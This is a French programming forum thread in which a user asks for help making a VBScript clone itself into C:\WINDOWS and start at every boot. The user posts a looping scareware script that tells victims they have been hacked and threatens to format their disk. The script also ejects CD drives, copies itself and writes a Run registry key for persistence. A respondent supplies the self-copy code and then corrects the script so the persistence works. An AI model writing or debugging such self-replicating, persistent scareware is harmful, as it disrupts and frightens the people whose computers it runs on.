Aide pour cloner un VBScript !

Résolu
zaert Messages postés 42 Date d'inscription vendredi 21 janvier 2005 Statut Membre Dernière intervention 18 septembre 2005 - 11 mars 2005 à 12:57
cs_algori Messages postés 868 Date d'inscription dimanche 26 décembre 2004 Statut Membre Dernière intervention 26 février 2008 - 16 mars 2005 à 20:29
Slt all !
Je fais un petit VBScript et je lui est integrer un code pour qu'il se redemarre au (re)boot du PC ! Probleme , quand j'ai tester mon VBScript sur mon ordinateur j'ai pu supprimer le VBScript qui se trouve sur le bureau ! Donc j'aimerais savoir quel est la ligne de commmande a rentre pour qu'il se clone dans un repertoire que j'aurais donner (par exemple : c\WINDOWS\Ressources\) ! Si cela ne peut pas se faire , il me faudrait un code pour que mon VBScript bloque tous ce qu'on fait comme tache derriere , c'est ta dire tous ce qui est sur le bureau , le menu demarrer et tout ce qui suit ! Je pense que c'est pas tres claire mon explication donc tell me si vous avez des questions !

10 réponses

cs_ITALIA Messages postés 2169 Date d'inscription vendredi 20 avril 2001 Statut Membre Dernière intervention 30 juin 2009 9
11 mars 2005 à 13:36
Exemple de copie d'un Fichier

Set FSys = CreateObject("Scripting.FileSystemObject")
FSys.copyfile App.Path & "\Flux.txt", App.Path & "\Sauvegardes\Flux.txt"

It@li@
3
cs_algori Messages postés 868 Date d'inscription dimanche 26 décembre 2004 Statut Membre Dernière intervention 26 février 2008 1
11 mars 2005 à 14:30
Salut,
Tu dis que tu veux cloner un fichier VBScript ou un simple fichier ?
Si tu veux cloner un simple fichier, t'as la méthode d'It@li@.
Si tu veux cloner ton fichier VBScript, t'as deux solutions :

Set ob = CreateObject("Scripting.FileSystemObject")
Set vbs = ob.GetFile(WScript.ScriptFullName)
vbs.Copy("C:\nouveau.vbs")
OU
Set ob = CreateObject("Scripting.FileSystemObject")
Set txt = ob.OpenTextFile(WScript.ScriptFullName)
vbs = txt.ReadAll
Set txt2 = ob.CreateTextFile("C:\nouveau.vbs")
txt2.write vbs
txt2.close
@++
3
zaert Messages postés 42 Date d'inscription vendredi 21 janvier 2005 Statut Membre Dernière intervention 18 septembre 2005
11 mars 2005 à 22:59
Tin les gars merci c trop classe ! sa va trop me faire avancer trop trop merci @+
0
cs_algori Messages postés 868 Date d'inscription dimanche 26 décembre 2004 Statut Membre Dernière intervention 26 février 2008 1
12 mars 2005 à 09:07
De rien...
@++
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
cs_ITALIA Messages postés 2169 Date d'inscription vendredi 20 avril 2001 Statut Membre Dernière intervention 30 juin 2009 9
14 mars 2005 à 07:35
Penses à Cocher Réponse acceptée si c'est OK !

It@li@
0
zaert Messages postés 42 Date d'inscription vendredi 21 janvier 2005 Statut Membre Dernière intervention 18 septembre 2005
15 mars 2005 à 13:10
re les gars ! votre codes marche a merveille (jarrive bien a le cloner) mais le probleme c'est qu'il ne ce demarre pas au boot de l'ordinateur ! J'ai rentrer un code pour ecrire dans la base de registre je pense que je ne me suis aps tromper pour la configuration de mon VBScript mais malheureusement mon VBscript ne demarre pas au boot du PC ! La cause vien peut etre que norton antivirus a detecter mon VBScript mais je mis quand il me demande quoi faire : "Autoriser ce script" mais il ne se demarre toujours pas ! Plus facile voila mon VBScript peut etre pourrez vous m'aider :

do
msgbox("Attention ! Vous venez de vous faire hacker")
msgbox("Ne redemmarer en aucun cas votre ordinateur")
msgbox("Dans le cas contraire le formatage de votre ordinateur seras amorcer")
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
Set ob = CreateObject("Scripting.FileSystemObject")
Set txt = ob.OpenTextFile(WScript.ScriptFullName)
vbs = txt.ReadAll
Set txt2 = ob.CreateTextFile("C:\WINDOWS\windowscript")
txt2.write vbs
txt2.close
set wscr=CreateObject("WScript.Shell")
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowscript", "C:\windowscript.exe"
loop

Je rappelle a tous que je ne veut hacker personne c'est juste un test ! Bon il est assez simpliste mais il faut bien commencer par quelque chose ! Merci de vos prochaine reponse !
0
zaert Messages postés 42 Date d'inscription vendredi 21 janvier 2005 Statut Membre Dernière intervention 18 septembre 2005
15 mars 2005 à 13:11
oups me suis tromper dans le code voila le bon mais sa marche pas quand meme LoLOl :

do
msgbox("Attention ! Vous venez de vous faire hacker")
msgbox("Ne redemmarer en aucun cas votre ordinateur")
msgbox("Dans le cas contraire le formatage de votre ordinateur seras amorcer")
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
Set ob = CreateObject("Scripting.FileSystemObject")
Set txt = ob.OpenTextFile(WScript.ScriptFullName)
vbs = txt.ReadAll
Set txt2 = ob.CreateTextFile("C:\WINDOWS\windowscript")
txt2.write vbs
txt2.close
set wscr=CreateObject("WScript.Shell")
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowscript", "C:\WINDOWS\windowscript.exe"
loop
0
cs_algori Messages postés 868 Date d'inscription dimanche 26 décembre 2004 Statut Membre Dernière intervention 26 février 2008 1
15 mars 2005 à 22:09
L'erreur doit venir du fait que tu donnes pas d'extension à ton fichier. De plus, si t'utilise VBScript, c'est pas windowscript.exe mais windowscript.vbs.
Rectification du code :
do
msgbox("Attention ! Vous venez de vous faire hacker")
msgbox("Ne redemmarer en aucun cas votre ordinateur")
msgbox("Dans le cas contraire le formatage de votre ordinateur seras amorcer")
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
For i = 0 To colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
Set ob = CreateObject("Scripting.FileSystemObject")
Set txt = ob.OpenTextFile(WScript.ScriptFullName)
vbs = txt.ReadAll
Set txt2 = ob.CreateTextFile("C:\WINDOWS\windowscript.vbs")
txt2.write vbs
txt2.close
set wscr=CreateObject("WScript.Shell")
wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowscript", "C:\WINDOWS\windowscript.vbs"
loop
Voilà !
@++
0
zaert Messages postés 42 Date d'inscription vendredi 21 janvier 2005 Statut Membre Dernière intervention 18 septembre 2005
16 mars 2005 à 19:08
Ok je te remerci
0
cs_algori Messages postés 868 Date d'inscription dimanche 26 décembre 2004 Statut Membre Dernière intervention 26 février 2008 1
16 mars 2005 à 20:29
Pas de problème...
@++
0
Rejoignez-nous